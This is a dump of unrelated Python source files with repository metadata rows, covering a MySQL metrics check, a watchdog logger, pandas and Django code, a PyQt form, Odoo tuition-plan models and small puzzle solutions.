                # 0 queries inside InnoDB, 0 queries in queue
                results['Innodb_queries_inside'] = long(row[0])
                results['Innodb_queries_queued'] = long(row[4])
            prev_line = line
        # We need to calculate this metric separately
        try:
            results['Innodb_checkpoint_age'] = results[
                'Innodb_lsn_current'] - results['Innodb_lsn_last_checkpoint']
        except KeyError as e:
            self.log.error("Not all InnoDB LSN metrics available, unable to compute: {0}".format(e))
        # Finally we change back the metrics values to string to make the values
        # consistent with how they are reported by SHOW GLOBAL STATUS
        for metric, value in list(iteritems(results)):
            results[metric] = str(value)
        return results
def _get_variable_enabled(self, results, var):
enabled = self._collect_string(var, results)
return enabled and enabled.lower().strip() == 'on'
def _get_query_exec_time_95th_us(self, db):
# Fetches the 95th percentile query execution time and returns the value
# in microseconds
sql_95th_percentile = """SELECT `avg_us`, `ro` as `percentile` FROM
(SELECT `avg_us`, @rownum := @rownum + 1 as `ro` FROM
(SELECT ROUND(avg_timer_wait / 1000000) as `avg_us`
FROM performance_schema.events_statements_summary_by_digest
ORDER BY `avg_us` ASC) p,
(SELECT @rownum := 0) r) q
WHERE q.`ro` > ROUND(.95*@rownum)
ORDER BY `percentile` ASC
LIMIT 1"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_95th_percentile)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the perf schema \
'events_statements_summary_by_digest' table.")
return None
row = cursor.fetchone()
query_exec_time_95th_per = row[0]
return query_exec_time_95th_per
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("95th percentile performance metrics unavailable at this time: %s" % str(e))
return None
def _query_exec_time_per_schema(self, db):
# Fetches the avg query execution time per schema and returns the
# value in microseconds
sql_avg_query_run_time = """\
SELECT schema_name, ROUND((SUM(sum_timer_wait) / SUM(count_star)) / 1000000) AS avg_us
FROM performance_schema.events_statements_summary_by_digest
WHERE schema_name IS NOT NULL
GROUP BY schema_name"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_avg_query_run_time)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the perf schema \
'events_statements_summary_by_digest' table.")
return None
schema_query_avg_run_time = {}
for row in cursor.fetchall():
schema_name = str(row[0])
avg_us = long(row[1])
# set the tag as the dictionary key
schema_query_avg_run_time["schema:{0}".format(schema_name)] = avg_us
return schema_query_avg_run_time
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Avg exec time performance metrics unavailable at this time: %s" % str(e))
return None
def _query_size_per_schema(self, db):
# Fetches the avg query execution time per schema and returns the
# value in microseconds
sql_query_schema_size = """
SELECT table_schema,
SUM(data_length+index_length)/1024/1024 AS total_mb
FROM information_schema.tables
GROUP BY table_schema;
"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_query_schema_size)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the information schema 'tables' table.")
return None
schema_size = {}
for row in cursor.fetchall():
schema_name = str(row[0])
size = long(row[1])
# set the tag as the dictionary key
schema_size["schema:{0}".format(schema_name)] = size
return schema_size
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Avg exec time performance metrics unavailable at this time: %s" % str(e))
return {}
def _compute_synthetic_results(self, results):
if ('Qcache_hits' in results) and ('Qcache_inserts' in results) and ('Qcache_not_cached' in results):
if not int(results['Qcache_hits']):
results['Qcache_utilization'] = 0
else:
results['Qcache_utilization'] = (float(results['Qcache_hits']) /
(int(results['Qcache_inserts']) +
int(results['Qcache_not_cached']) +
int(results['Qcache_hits'])) * 100)
if all(v is not None for v in (self._qcache_hits, self._qcache_inserts, self._qcache_not_cached)):
if not (int(results['Qcache_hits']) - self._qcache_hits):
results['Qcache_instant_utilization'] = 0
else:
top = float(results['Qcache_hits']) - self._qcache_hits
bottom = ((int(results['Qcache_inserts']) - self._qcache_inserts) +
(int(results['Qcache_not_cached']) - self._qcache_not_cached) +
(int(results['Qcache_hits']) - self._qcache_hits))
results['Qcache_instant_utilization'] = ((top / bottom) * 100)
# update all three, or none - for consistent samples.
self._qcache_hits = int(results['Qcache_hits'])
self._qcache_inserts = int(results['Qcache_inserts'])
self._qcache_not_cached = int(results['Qcache_not_cached'])
| [
"bramschuur@gmail.com"
] | bramschuur@gmail.com |
8561b0f2554687e2aae64fddcd6fc36f01415b60 | a38bbada2df886df5336f8843c22b9576c5966d0 | /inotify/watchdog_simple_example.py | a775db357fe5909642212ba67306efeb8b252935 | [] | no_license | Liuxboy/LearningPython | e82edfea6756e887f06f029aac365c571e4eb45d | 7f7423b1d6030ce42ff301fe0c78cd2153a9e6ad | refs/heads/master | 2021-06-24T17:03:27.270077 | 2021-04-30T10:56:54 | 2021-04-30T10:56:54 | 94,400,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Project: LearningPython
# Author: liuchundong <br>
# Date: 2019-7-25 <br>
# Time: 18:15 <br>
# Desc:
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
    # Log every filesystem event under the watched directory until Ctrl-C.
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')

    # Watch the directory given as the first CLI argument; default to cwd.
    watch_path = sys.argv[1] if len(sys.argv) > 1 else '.'

    observer = Observer()
    observer.schedule(LoggingEventHandler(), watch_path, recursive=True)
    observer.start()
    try:
        # The observer works on its own thread; just keep the main thread alive.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
| [
"342353772@qq.com"
] | 342353772@qq.com |
03af35f09650374be17ae6090d7a5b212218912a | 46d3bfb9dc457c232e71212944abd066ccc76ae9 | /load_data.py | b10ba1f3a374740fb1da634db44be57c289a1f35 | [] | no_license | Mahmoud-Elshaer/Us_bikeshare_data | 04ec265025cd4d94a60a25cae48bc77ad2644d71 | 683d7eab677ae510ce273c5274b3b159359018f1 | refs/heads/master | 2022-12-03T21:02:09.587208 | 2020-08-25T02:57:40 | 2020-08-25T02:57:40 | 290,097,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,536 | py | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv' }
def load_data(city, month, day):
    """
    Loads data for the specified city and filters by month and day if applicable.

    Args:
        (str) city - name of the city to analyze (key of CITY_DATA)
        (str) month - name of the month to filter by (any case), or "all" to apply no month filter
        (str) day - name of the day of week to filter by (any case), or "all" to apply no day filter
    Returns:
        df - Pandas DataFrame containing city data filtered by month and day
    """
    # load data file into a dataframe
    df = pd.read_csv(CITY_DATA[city])

    # convert the Start Time column to datetime
    df['Start Time'] = pd.to_datetime(df['Start Time'])

    # extract month and day of week from Start Time to create new columns.
    # `.dt.weekday_name` was removed in pandas 1.0; day_name() is the
    # supported replacement and returns the same capitalized names.
    df['month'] = df['Start Time'].dt.month
    df['day_of_week'] = df['Start Time'].dt.day_name()

    # filter by month if applicable
    if month != 'all':
        # use the index of the months list to get the corresponding int;
        # title-case the input so 'june' and 'June' both work, consistent
        # with the case-insensitive handling of `day` below
        months = ['January', 'February', 'March', 'April', 'May', 'June']
        month = months.index(month.title()) + 1

        # filter by month to create the new dataframe
        df = df[df['month'] == month]

    # filter by day of week if applicable
    if day != 'all':
        # filter by day of week to create the new dataframe
        df = df[df['day_of_week'] == day.title()]

    return df
"noreply@github.com"
] | noreply@github.com |
3d9a1aa36617cb12a9d7b956658c16de15f49e6d | 4944178c246ab0811939b32cd192b7ce692b93cd | /services/github-bots/PredictLabels/test_predictor.py | 502c80d390ddf383098b96e434925b6760420fcb | [
"Apache-2.0"
] | permissive | ChaiBapchya/incubator-mxnet-ci | 654dce74904a5afd16abf16fcb34b0caeeac3586 | 0fb0e75b83a371130caf43098ec1e5b12326cb25 | refs/heads/master | 2021-06-27T10:31:17.083300 | 2020-10-12T01:42:50 | 2020-10-12T01:42:50 | 212,455,155 | 0 | 0 | Apache-2.0 | 2019-10-02T22:45:25 | 2019-10-02T22:45:25 | null | UTF-8 | Python | false | false | 4,713 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import requests
import boto3
from botocore.exceptions import ClientError
from botocore.exceptions import NoCredentialsError
from DataFetcher import DataFetcher
import unittest
from Predictor import Predictor
# some version issue
try:
from unittest.mock import patch
except ImportError:
from mock import patch
# test coverage: 100%
class TestLabelBot(unittest.TestCase):
    """Unit tests for Predictor: rule-based, ML-based and combined prediction."""

    def setUp(self):
        # Fresh Predictor per test; ML model files are loaded lazily via reload().
        self.pr = Predictor()

    @staticmethod
    def _issue_payload(body):
        """Return the fake GitHub issue JSON served by the mocked API call.

        Extracted because the identical payload was previously duplicated in
        three tests; only the issue body varies between them.
        """
        return {
            "body": body,
            "created_at": "2018-07-28T18:27:17Z",
            "comments": "0",
            "number": 11925,
            "labels": [{'name': 'Doc'}],
            "state": "open",
            "title": "a feature requests for scala package",
            "html_url": "https://github.com/apache/incubator-mxnet/issues/11925",
        }

    def test_tokenize(self):
        words = self.pr.tokenize("hello_world")
        self.assertEqual(words, set(['hello', 'world']))

    def test_rule_based(self):
        with patch('DataFetcher.requests.get') as mocked_get:
            mocked_get.return_value.status_code = 200
            mocked_get.return_value.json.return_value = self._issue_payload("issue's body")
            predictions = self.pr.rule_based([11925])
            self.assertEqual([['Feature', 'scala']], predictions)

    def test_ml_predict(self):
        self.pr.reload(tv_file='Vectorizer.p',
                       clf_file='Classifier.p',
                       labels_file='Labels.p')
        with patch('DataFetcher.requests.get') as mocked_get:
            mocked_get.return_value.status_code = 200
            mocked_get.return_value.json.return_value = self._issue_payload("test")
            predictions = self.pr.ml_predict([11925])
            self.assertEqual([['Feature']], predictions)

    def test_predict(self):
        self.pr.reload(tv_file='Vectorizer.p',
                       clf_file='Classifier.p',
                       labels_file='Labels.p')
        with patch('DataFetcher.requests.get') as mocked_get:
            mocked_get.return_value.status_code = 200
            mocked_get.return_value.json.return_value = self._issue_payload("test")
            predictions = self.pr.predict([11925])
            self.assertEqual([['Feature', 'scala']], predictions)
if __name__ == "__main__":
    # Allow running this test module directly: python test_predictor.py
    unittest.main()
| [
"noreply@github.com"
] | noreply@github.com |
09b46d53003a45b84f43ab41e9cbcf1dc1a4b7f2 | e266e97e66b8459dc4f058ff6db4dea0f88d553d | /pytorch_api_linear.py | cb3edd2addf5c77e5e51c90eead451dc4b72bf0a | [] | no_license | ye97/pytorch_b | 9bbce257c12923d51d554eab14442f20407e03b9 | d9314d53f138f6f09cc1306412f53552452f9e33 | refs/heads/master | 2023-03-22T15:18:19.238374 | 2021-03-07T15:16:18 | 2021-03-07T15:16:18 | 343,756,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,350 | py | import torch
#model实现自己的类,继承module模块
class Model(torch.nn.Module):
    """Minimal linear-regression model: y = w * x + b with scalar w and b."""

    def __init__(self):
        # Initialize the nn.Module machinery (parameter registration, hooks)
        # before attaching any submodules; plain super() is the Py3 form of
        # super(Model, self).
        super().__init__()
        # One input feature -> one output feature; owns `weight` and `bias`.
        self.linear = torch.nn.Linear(1, 1)

    def forward(self, x):
        """Forward pass: apply the affine transform to the input batch."""
        return self.linear(x)
model = Model()
# Both the loss and the optimizer are callable objects: constructed once,
# then invoked with tensors on every iteration.
loss = torch.nn.MSELoss(reduction="sum")
optim = torch.optim.SGD(model.parameters(), lr=0.01)

# Training data for y = 2x: the model should learn weight ~= 2, bias ~= 0.
x_data = torch.Tensor([[1.0], [2.0], [3.0]])
y_data = torch.Tensor([[2.0], [4.0], [6.0]])

for epoch in range(1, 1000):
    # Forward pass through the graph built by Model.forward
    y = model(x_data)
    cost = loss(y, y_data)
    # Fixed: the loss value was previously printed twice per line.
    print(epoch, ":", cost.data.item())
    optim.zero_grad()   # clear gradients accumulated from the previous step
    cost.backward()     # backpropagate
    optim.step()        # update parameters

print(model.linear.weight.item())
print(model.linear.bias.item())
"ye79_2020@qq.com"
] | ye79_2020@qq.com |
1f33447947159a11ecf117ebfd09d4a0232c26ed | 890a6921b9dbc3d849ee51366c76a791761d35d2 | /.qt_for_python/uic/PlacefieldVisualSelectionWidgetBase.py | e5bfd84f65b40625dd5b625a786686f1a3fc1927 | [] | no_license | CommanderPho/Spike3D | 87e1ea17a76080e18e835e9d015e7fe7bb3426e4 | 63e5e78c3bcb28f3dbab02d6354e6eb83cbccc2a | refs/heads/master | 2023-08-17T10:40:44.389682 | 2023-08-16T10:57:12 | 2023-08-16T10:57:12 | 413,545,455 | 2 | 0 | null | 2022-10-22T05:54:57 | 2021-10-04T18:48:06 | Jupyter Notebook | UTF-8 | Python | false | false | 4,107 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'c:\Users\pho\repos\pyPhoPlaceCellAnalysis\src\pyphoplacecellanalysis\GUI\Qt\PlacefieldVisualSelectionControls\PlacefieldVisualSelectionWidgetBase.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_rootForm(object):
def setupUi(self, rootForm):
rootForm.setObjectName("rootForm")
rootForm.resize(94, 126)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(rootForm.sizePolicy().hasHeightForWidth())
rootForm.setSizePolicy(sizePolicy)
rootForm.setMinimumSize(QtCore.QSize(50, 0))
rootForm.setBaseSize(QtCore.QSize(50, 126))
rootForm.setStyleSheet("background-color: rgb(71, 58, 46);\n"
"border-color: rgb(207, 207, 207);\n"
"background-color: rgba(71, 65, 60, 180);\n"
"color: rgb(244, 244, 244);\n"
"border-color: rgb(0, 0, 0);")
self.gridLayout = QtWidgets.QGridLayout(rootForm)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.groupBox = QtWidgets.QGroupBox(rootForm)
self.groupBox.setMinimumSize(QtCore.QSize(50, 0))
self.groupBox.setMaximumSize(QtCore.QSize(160, 160))
self.groupBox.setBaseSize(QtCore.QSize(50, 0))
self.groupBox.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.groupBox.setFlat(False)
self.groupBox.setObjectName("groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_2.setContentsMargins(2, 0, 2, 4)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.btnTitle = QtWidgets.QPushButton(self.groupBox)
self.btnTitle.setObjectName("btnTitle")
self.verticalLayout_2.addWidget(self.btnTitle)
self.btnColorButton = ColorButton(self.groupBox)
self.btnColorButton.setEnabled(False)
self.btnColorButton.setMinimumSize(QtCore.QSize(24, 24))
self.btnColorButton.setText("")
self.btnColorButton.setObjectName("btnColorButton")
self.verticalLayout_2.addWidget(self.btnColorButton)
self.chkbtnPlacefield = QtWidgets.QToolButton(self.groupBox)
self.chkbtnPlacefield.setCheckable(True)
self.chkbtnPlacefield.setChecked(False)
self.chkbtnPlacefield.setPopupMode(QtWidgets.QToolButton.DelayedPopup)
self.chkbtnPlacefield.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.chkbtnPlacefield.setObjectName("chkbtnPlacefield")
self.verticalLayout_2.addWidget(self.chkbtnPlacefield)
self.chkbtnSpikes = QtWidgets.QToolButton(self.groupBox)
self.chkbtnSpikes.setCheckable(True)
self.chkbtnSpikes.setChecked(False)
self.chkbtnSpikes.setPopupMode(QtWidgets.QToolButton.DelayedPopup)
self.chkbtnSpikes.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.chkbtnSpikes.setObjectName("chkbtnSpikes")
self.verticalLayout_2.addWidget(self.chkbtnSpikes)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 1)
self.retranslateUi(rootForm)
QtCore.QMetaObject.connectSlotsByName(rootForm)
def retranslateUi(self, rootForm):
_translate = QtCore.QCoreApplication.translate
rootForm.setWindowTitle(_translate("rootForm", "Pf"))
self.groupBox.setTitle(_translate("rootForm", "pf[i]"))
self.btnTitle.setText(_translate("rootForm", "pf[i]"))
self.chkbtnPlacefield.setText(_translate("rootForm", "pf"))
self.chkbtnSpikes.setText(_translate("rootForm", "spikes"))
from pyphoplacecellanalysis.External.pyqtgraph.widgets.ColorButton import ColorButton
| [
"CommanderPho@users.noreply.github.com"
] | CommanderPho@users.noreply.github.com |
808fb0d70182870a1da1d6b69365634f2fd9371d | 482cf94a03646d5e6b8d2def92f9d772fce99c3b | /api/models.py | fb6a4367679a0e820a2adf0c442d71bbe0cc59ad | [] | no_license | ahmadalsalama/unitedway | 9933270d0ae3a95460388bb700f6d38c289f4ad9 | 9c7c6e96f3522cf99556cbb34e6dadf7cd4426e5 | refs/heads/master | 2020-12-31T07:20:44.080129 | 2016-04-29T07:28:24 | 2016-04-29T07:28:24 | 57,320,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,998 | py | from django.db import models
from datetime import datetime
CATEGORY_CHOICES = ((0, 'Health'), (1, 'Fitness'), (2, 'Social'))
STATUS_CHOICES = ((0, 'Open'), (1, 'Accepted'), (2, 'Declined'))
USER_TYPES = ((True, 'Organizer'), (False, 'User'))
class User(models.Model):
username = models.CharField(max_length=15, primary_key=True) # SSO
name = models.CharField(max_length=30) # First & Last Name
country = models.CharField(max_length=30)
donations = models.IntegerField(default=0)
num_drinks = models.IntegerField(default=0)
email = models.CharField(max_length=30)
is_org = models.BooleanField('organizer', default=False)
def __str__(self):
return "%s (%s)" % (self.name, dict(USER_TYPES)[self.is_org])
class BadgeDB(models.Model):
username = models.CharField(max_length=15) # SSO
name = models.CharField(max_length=30) # First & Last Name
badgeNumber = models.CharField(max_length=20, primary_key=True) #badge number
def __str__(self):
return self.name
# IGNORE
class Task(models.Model):
name = models.CharField(max_length=30)
description = models.CharField(max_length=2500)
category = models.IntegerField(choices=CATEGORY_CHOICES)
def __str__(self):
return "%s (%s)" % (self.name, dict(CATEGORY_CHOICES)[self.category])
class Event(models.Model):
name = models.CharField(max_length=30)
description = models.CharField(max_length=2500)
category = models.IntegerField(choices=CATEGORY_CHOICES)
max_capacity = models.IntegerField()
start_date = models.DateTimeField(default=datetime(datetime.today().year, datetime.today().month, datetime.today().day, 0, 0, 0))
end_date = models.DateTimeField(default=datetime(datetime.today().year, datetime.today().month, datetime.today().day, 0, 0, 0)) # no need
suggested_donation = models.IntegerField()
org = models.ForeignKey(User)
def __str__(self):
return "%s (%s)" % (self.name, dict(CATEGORY_CHOICES)[self.category])
class Comment(models.Model):
owner = models.ForeignKey(User)
event = models.ForeignKey(Event)
comment = models.TextField()
canRemove = models.BooleanField(default=False)
def __str__(self):
return self.owner.name
class Participation(models.Model):
user = models.ForeignKey(User)
event = models.ForeignKey(Event)
has_joined = models.BooleanField(default=False)
has_rsvpd = models.BooleanField(default=False) # RSVP
created = models.DateTimeField(auto_now_add=True) # no need
def __str__(self):
if self.has_joined:
return "%s has joined %s" % (self.user.name, self.event)
return "%s has rsvpd %s" % (self.user.name, self.event)
#IGNORE
class Challenge(models.Model):
creator = models.ForeignKey(User, null=True, related_name='creator')
assignee = models.ForeignKey(User, null=True, related_name='assignee')
task = models.ForeignKey(Task)
status = models.IntegerField(choices=STATUS_CHOICES, default=0)
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "%s challenges %s to %s" % (self.creator.name, self.assignee.name, self.task.description.lower()) | [
"ahmad.alsalama@gmail.com"
] | ahmad.alsalama@gmail.com |
110cfbb3db299c2f9febd17eee212eae41611cab | 71ff0591891b63a95e5bd15fbf78f0b7526d5b86 | /week_5/jes_week2.py | 757b68a31f64309f9c6b69f7c6ddcc7606fb2061 | [] | no_license | AlexanderJDupree/CS160 | e38889d3deda885cfd61087f6cf99c01c9ade1e1 | 8bdfd9327fe8195f412f1c11a59314d8a0c31cfe | refs/heads/master | 2021-05-13T19:07:08.540434 | 2019-01-22T21:13:48 | 2019-01-22T21:13:48 | 116,884,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | import string
original = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc " \
"dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq " \
"rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu " \
"ynnjw ml rfc spj."
url = "http://www.pythonchallenge.com/pc/def/map.html"
table = str.maketrans(
"abcdefghijklmnopqrstuvwxyz", "cdefghijklmnopqrstuvwxyzab"
)
print(url.translate(table))
| [
"Alexander.j.dupree@gmail.com"
] | Alexander.j.dupree@gmail.com |
4cda39ca61d35d116dfa1f795e829856cfa8aa9f | 53fce93304f306a940dd69c0362a39ca21c062ee | /tuition_plan/models/tuition_plan.py | 7ee1d69aaee97cbba24c0987e7a8e616bd8ea8fc | [] | no_license | sgcalle/ew-dev | 07ea4d7cdc6c085e5d44b66f91e6c74ca231cf64 | 94256458addf8e07ef4b29ae025d63dcf35757fb | refs/heads/main | 2023-03-02T08:10:06.390910 | 2021-02-04T13:49:37 | 2021-02-04T13:49:37 | 334,944,264 | 0 | 0 | null | 2021-02-10T15:21:00 | 2021-02-01T12:34:41 | Python | UTF-8 | Python | false | false | 10,222 | py | # -*- coding: utf-8 -*-
from dateutil.relativedelta import relativedelta
from odoo import models, fields, api
from odoo.exceptions import ValidationError
class TuitionPlan(models.Model):
_name = "tuition.plan"
_description = "Tuition Plan"
name = fields.Char(string="Name",
required=True)
active = fields.Boolean(string="Active",
default=True)
period_type = fields.Selection(string="Period Type",
selection=[
("fiscal_year","Fiscal Year"),
("year_after","Year After"),
("manual","Manual")],
default="fiscal_year",
required=True)
reference_date = fields.Date(string="Reference Date",
help="Used to identify the period based on the selected period type")
period_date_from = fields.Date(string="Period Start",
compute="_compute_period_dates",
required=True,
readonly=False,
store=True,
help="Autocomputed based on the selected reference date and period type")
period_date_to = fields.Date(string="Period End",
compute="_compute_period_dates",
required=True,
readonly=False,
store=True,
help="Autocomputed based on the selected reference date and period type")
category_id = fields.Many2one(string="Category",
comodel_name="product.category",
required=True,
domain="[('parent_id','=',False)]",
help="Category of the products included in this tuition plan")
automation = fields.Selection(string="Automation",
selection=[
("quotation", "Create Quotation"),
("sales_order", "Create Sales Order"),
("draft_invoice", "Create Sales Order and Draft Invoice"),
("posted_invoice", "Create Sales Order and Posted Invoice")],
required=True,
default="quotation",
help="Specify what will automatically be created when an installment of this tuition plan is executed")
first_charge_date = fields.Date(string="First Charge Date",
required=True,
help="The first date of the installments")
payment_term_id = fields.Many2one(string="Payment Terms",
comodel_name="account.payment.term",
help="Payment term for the order and/or invoice generated.")
first_due_date = fields.Date(string="First Due Date",
help="Select the day of the due date. Only the day is used. Required if no payment term is set.")
discount_ids = fields.One2many(string="Multi-child Discounts",
comodel_name="tuition.plan.discount",
inverse_name="plan_id",
help="Discounts to apply based on the number of enrolled students in a family. Only enrolled students with the date of birth set is included.")
installment_ids = fields.One2many(string="Installments",
comodel_name="tuition.plan.installment",
inverse_name="plan_id",
help="Installment dates generated for the tuition plan based on the first charge date")
product_ids = fields.One2many(string="Products",
comodel_name="tuition.plan.product",
inverse_name="plan_id",
help="Product to include in the order and/or invoice generated")
company_id = fields.Many2one(string="Company",
comodel_name="res.company",
required=True,
readonly=True,
default=lambda self: self.env.company)
grade_level_ids = fields.Many2many(string="Grade Levels",
comodel_name="school_base.grade_level",
required=True,
help="Grade levels to which this tuition plan applies and to whom it will generate order/invoice for")
analytic_account_id = fields.Many2one(string="Analytic Account",
comodel_name="account.analytic.account")
default = fields.Boolean(string="Default",
help="Specify if this tuition plan should be auto-assigned to students if they don't have any that overlaps with this plan")
partner_ids = fields.Many2many(string="Students",
comodel_name="res.partner",
relation="partner_tuition_plan_rel",
domain="[('grade_level_id','in',grade_level_ids)]",
help="Students to which this tuition plan was manually assigned")
discount_product_id = fields.Many2one(string="Discount Product",
comodel_name="product.product",
help="Product to use when adding multi-child discount lines")
default_partner_ids = fields.Many2many(string="Default Students",
comodel_name="res.partner",
compute="_compute_default_partner_ids")
use_student_payment_term = fields.Boolean(string="Use Student Payment Terms",
help="If checked, the invoice payment terms is taken from the student if any")
report_ids = fields.One2many(string="Report Lines",
comodel_name="tuition.plan.report",
inverse_name="plan_id")
@api.constrains("default", "grade_level_ids", "period_date_from", "period_date_to", "category_id", "active")
def _check_default(self):
for plan in self.filtered(lambda p: p.default):
matched = self.search([
"&", ("id","!=",plan.id),
"&", ("default","=",True),
"&", ("category_id","=",plan.category_id.id),
"&", ("grade_level_ids","in",plan.grade_level_ids.ids),
"|", ("period_date_from","=",plan.period_date_from),
("period_date_to","=",plan.period_date_to)], limit=1)
if matched:
raise ValidationError(
"Unable to set as default. This tuition plan overlaps with %s (ID %d)." % (matched.name, matched.id))
@api.constrains("partner_ids", "grade_level_ids", "period_date_from", "period_date_to", "category_id", "active")
def _check_partner_ids(self):
for plan in self:
plan.partner_ids._check_tuition_plan_ids()
@api.depends("reference_date", "period_type")
def _compute_period_dates(self):
for plan in self:
date_from = False
date_to = False
if plan.reference_date:
if plan.period_type == "fiscal_year":
dates = plan.company_id.compute_fiscalyear_dates(plan.reference_date)
date_from = dates["date_from"]
date_to = dates["date_to"]
if plan.period_type == "year_after":
date_from = plan.reference_date
date_to = date_from + relativedelta(years=1, days=-1)
plan.period_date_from = date_from
plan.period_date_to = date_to
@api.constrains("first_charge_date", "period_date_to")
def _compute_installment_ids(self):
for plan in self:
plan.installment_ids.unlink()
if not plan.first_charge_date:
continue
installment_ids = []
months = 0
installment_date = plan.first_charge_date + relativedelta(months=months)
while installment_date <= plan.period_date_to:
installment_ids.append((0, 0, {
"date": installment_date,
}))
months += 1
installment_date = plan.first_charge_date + relativedelta(months=months)
plan.installment_ids = installment_ids
def get_overlapping_plans(self):
self.ensure_one()
return self.search([
"&", ("category_id","=",self.category_id.id),
"&", ("grade_level_ids","in",self.grade_level_ids.ids),
"!", "|", ("period_date_to","<",self.period_date_from),
("period_date_from",">",self.period_date_to)
])
def _compute_default_partner_ids(self):
for plan in self:
result = []
if plan.default:
students = self.env["res.partner"].search([
("person_type","=","student"),
("tuition_plan_ids","=",False),
("grade_level_id","in",plan.grade_level_ids.ids)
])
result = students.ids
plan.default_partner_ids = result
def action_open_report(self):
self.ensure_one()
action = self.env.ref("tuition_plan.tuition_plan_report_action").read()[0]
context = eval(action["context"])
context.update({
"search_default_plan_id": self.id,
})
action["context"] = context
return action
def action_generate_forecast(self):
report_obj = self.env["tuition.plan.report"]
plan_reports = report_obj.search([("plan_id","in",self.ids)])
plan_reports.unlink()
for plan in self:
record_data = []
for installment in plan.installment_ids:
self._cr.execute("SAVEPOINT tuition_plan_report")
sales = installment.with_context(
override_sale_order_name="For Tuition Plan Report",
automation="quotation").execute()
for sale in sales:
for line in sale.order_line:
record_data.append({
"plan_id": plan.id,
"partner_id": sale.partner_id.id,
"family_id": sale.family_id.id,
"student_id": sale.student_id.id,
"product_id": line.product_id.id,
"price_subtotal": line.price_subtotal,
"price_tax": line.price_tax,
"price_total": line.price_total,
"grade_level_id": sale.student_id.grade_level_id.id,
"currency_id": sale.currency_id.id,
"homeroom": sale.student_id.homeroom,
"date": installment.date,
})
try:
self._cr.execute("ROLLBACK TO SAVEPOINT tuition_plan_report")
self.pool.clear_caches()
self.pool.reset_changes()
except psycopg2.InternalError:
pass
for data in record_data:
report_obj.create(data)
| [
"jaragon@eduwebgroup.com"
] | jaragon@eduwebgroup.com |
8577d6ba440c770c4416e9348d8c2bf56b4753b0 | 74dfc045bf1af3b00307a2324ae5032d4c90e263 | /Day_1_2.py | 6677b2c8f035b5484dbcd9ea9dbc03692bdd9072 | [] | no_license | Moneymet/Advent_of_Code | 0a568ce749139551b940a19933b21e0579c279d7 | d3d09e82e5cb8218bae0fadf821c63361a4254b1 | refs/heads/master | 2023-03-17T17:13:53.656830 | 2021-03-12T07:08:25 | 2021-03-12T07:08:25 | 338,199,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | sum_value = 2020
f = open("input_1.txt", "r")
lines = f.read()
expenses_string = lines.split("\n")
expenses = list(map(int, expenses_string))
expenses.sort()
#Finds combination of 3 numbers in a sorted int list adding up to specified sum
def find_sum_multiplied_3(sum_value, expenses):
for x in expenses:
for y in expenses[1:len(expenses)]:
#Skips checking z values if the sum of the first and second number is too high to possibly find a low enough third value
if x + y < sum_value-expenses[0]:
for z in expenses[2:len(expenses)]:
if x+y+z == sum_value:
return x*y*z
multiplied_sum = find_sum_multiplied_3(sum_value, expenses)
print(multiplied_sum) | [
"christergum@hotmail.com"
] | christergum@hotmail.com |
